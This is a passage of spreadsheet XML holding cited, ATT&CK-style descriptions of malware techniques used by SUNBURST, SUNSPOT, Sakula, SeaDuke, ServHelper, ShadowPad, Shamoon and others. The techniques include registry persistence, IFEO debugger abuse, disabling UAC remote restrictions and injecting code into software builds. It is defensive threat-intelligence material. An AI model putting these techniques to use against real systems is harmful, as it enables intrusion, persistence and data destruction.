    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected information from a compromised host.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had a command to delete files.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands to enumerate files and directories.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) created an Image File Execution Options (IFEO) Debugger registry value for the process &lt;code&gt;dllhost.exe&lt;/code&gt; to trigger the installation of [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to [SUNSPOT](https://attack.mitre.org/software/S0562).(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed IFEO values to clean up traces of execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) delivered different payloads, including [TEARDROP](https://attack.mitre.org/software/S0560) in at least one instance.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) added junk bytes to its C2 over HTTP.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) created VBScripts that were named after existing services or folders to blend into legitimate activities.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start&lt;/code&gt; registry entries to value 4.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020) It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) strings were compressed and encoded in Base64.(Citation: Microsoft Analyzing Solorigate Dec 2020) [SUNBURST](https://attack.mitre.org/software/S0559) also obfuscated collected system information using a FNV-1a + XOR algorithm.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the registry value &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid&lt;/code&gt; from compromised hosts.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked for a variety of antivirus/endpoint detection agents prior to execution.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used Base64 encoding in its C2 traffic.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)(Citation: Symantec Sunburst Sending Data January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) encrypted C2 traffic using a single-byte-XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked the domain name of the compromised host to verify it was running in a real environment.(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected hostname, OS version, and device uptime.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the username from a compromised host.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) remained dormant after initial access for a period of up to two weeks.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used VBScripts to initiate the execution of payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used the WMI query &lt;code&gt;Select * From Win32_SystemDriver&lt;/code&gt; to retrieve a driver listing.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) modified its security token to grants itself debugging privileges by adding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) malware was designed and used to insert [SUNBURST](https://attack.mitre.org/software/S0559) into software builds of the SolarWinds Orion IT management product.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) decrypts [SUNBURST](https://attack.mitre.org/software/S0559), which was stored in AES128-CBC encrypted blobs.(Citation: CrowdStrike SUNSPOT Implant January 2021)  </t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>Following the successful injection of [SUNBURST](https://attack.mitre.org/software/S0559), [SUNSPOT](https://attack.mitre.org/software/S0562) deleted a temporary file it created named &lt;code&gt;InventoryManager.bk&lt;/code&gt; after restoring the original SolarWinds Orion source code to the software library.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) enumerated the Orion software Visual Studio solution directory path.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) was identified on disk with a filename of &lt;code&gt;taskhostsvc.exe&lt;/code&gt; and it created an encrypted log file at &lt;code&gt;C:\Windows\Temp\vmware-vmdmp.log&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) used Windows API functions such as &lt;code&gt;MoveFileEx&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess&lt;/code&gt; as part of the [SUNBURST](https://attack.mitre.org/software/S0559) injection process.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for [SUNBURST](https://attack.mitre.org/software/S0559) source code and data extracted from the SolarWinds Orion &lt;MsBuild.exe&lt;/code&gt; process.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) monitored running processes for instances of &lt;code&gt;MsBuild.exe&lt;/code&gt; by hashing the name of each running process and comparing it to the corresponding value &lt;code&gt;0x53D525&lt;/code&gt;. It also extracted command-line arguments and individual arguments from the running &lt;code&gt;MsBuild.exe&lt;/code&gt; process to identify the directory path of the Orion software Visual Studio solution.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) created a copy of the SolarWinds Orion software source file with a &lt;code&gt;.bk&lt;/code&gt; extension to backup the original content, wrote [SUNBURST](https://attack.mitre.org/software/S0559) using the same filename but with a &lt;code&gt;.tmp&lt;/code&gt; extension, and then moved [SUNBURST](https://attack.mitre.org/software/S0559) using &lt;code&gt;MoveFileEx&lt;/code&gt; to the original filename with a &lt;code&gt;.cs&lt;/code&gt; extension so it could be compiled within Orion software.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).(Citation: Carnegie Mellon University Supernova Dec 2020)(Citation: Splunk Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) has masqueraded as a legitimate SolarWinds DLL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) contained Base64-encoded strings.(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is a Web shell.(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) contains UAC bypass code for both 32- and 64-bit systems.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples use cmd.exe to delete temporary files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) has the capability to download files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses single-byte XOR obfuscation to obfuscate many of its files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Most [Sakula](https://attack.mitre.org/software/S0074) samples maintain persistence by setting the Registry Run key &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; in the HKLM or HKCU hive, with the Registry value and file name varying by sample.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) encodes C2 traffic with single-byte XOR keys.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses HTTP for C2.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. [Sakula](https://attack.mitre.org/software/S0074) also has the capability to invoke a reverse shell.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has used garbage code to pad some of its malware components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen deleting its own files and payloads to make analysis of the attack more difficult.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen using AES or DES to encrypt payloads and payload components.(Citation: Sophos SamSam Apr 2018)(Citation: Talos SamSam Jan 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) uses custom batch scripts to execute some of its components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) compressed data with zlib prior to sending it over C2.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) can securely delete files, including deleting itself from the victim.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of uploading and downloading files.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to use pass the ticket with Kerberos for authentication.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses a module to execute Mimikatz with PowerShell to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) has been packed with the UPX packer.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic is base64-encoded.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic has been encrypted with RC4 and AES.(Citation: Mandiant No Easy Breach)(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of executing commands.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to delete a specified file.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has the capability to identify the drive type on a victim.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to download additional files.(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has masqueraded as a service called "SaSaut" with a display name of "System Authorization Service" in an apparent attempt to masquerade as a legitimate service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) obfuscates configuration data.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to perform a process listing.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) creates a Registry entry to ensure infection after reboot under &lt;code&gt;HKLM\Software\Microsoft\Windows\currentVersion\Run&lt;/code&gt;.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses cmd.exe to create a reverse shell on the infected endpoint.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is capable of installing itself as a service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has a module to delete itself from the infected machine.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may download additional files to execute.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has created a new user and added it to the "Remote Desktop Users" and "Administrators" groups.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may attempt to establish persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; run key.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains a module for downloading and executing DLLs that leverages &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains modules that will use [schtasks](https://attack.mitre.org/software/S0111) to carry out malicious operations.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate Windows version and system architecture.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate the username of the victim.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) can execute shell commands against [cmd](https://attack.mitre.org/software/S0106).(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used DNS tunneling for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has decrypted a binary blob to start execution.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) uses a DGA that is based on the day of the month for C2 servers.(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected a DLL into svchost.exe.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used FTP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has deleted arbitrary Registry values.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has downloaded code from a C2 server.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) maintains a configuration block and virtual file system in the Registry.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used UDP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encoded data as readable Latin characters.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encrypted a virtual file system and various files.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the PID of a malicious process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected an install module into a newly created process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has sent data back to C2 every 8 hours.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the domain name of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the username of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the current date and time of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to disable UAC remote restrictions by modifying the Registry.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has an operational mode for encrypting data instead of overwriting it.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has been seen overwriting features of disk structure such as the MBR.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can download an executable to run on the victim.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to copy itself to remote machines on the network.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the "MaintenaceSrv" service, which misspells the word "maintenance."(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) contains base64-encoded strings.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) queries several Registry keys to identify hard disk partitions to overwrite.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) scans the C-class subnet of the IPs on the victim's interfaces.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) to execute the malware.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
